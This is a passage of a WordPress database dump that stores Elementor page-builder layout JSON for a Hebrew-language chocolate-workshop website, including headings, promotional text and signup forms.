\\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(959,195,'_elementor_version','0.4'),(966,141,'_edit_lock','1534840667:1'),(968,197,'_wp_page_template','elementor_canvas'),(969,197,'_elementor_edit_mode','builder'),(970,197,'_elementor_template_type','post'),(971,197,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"descript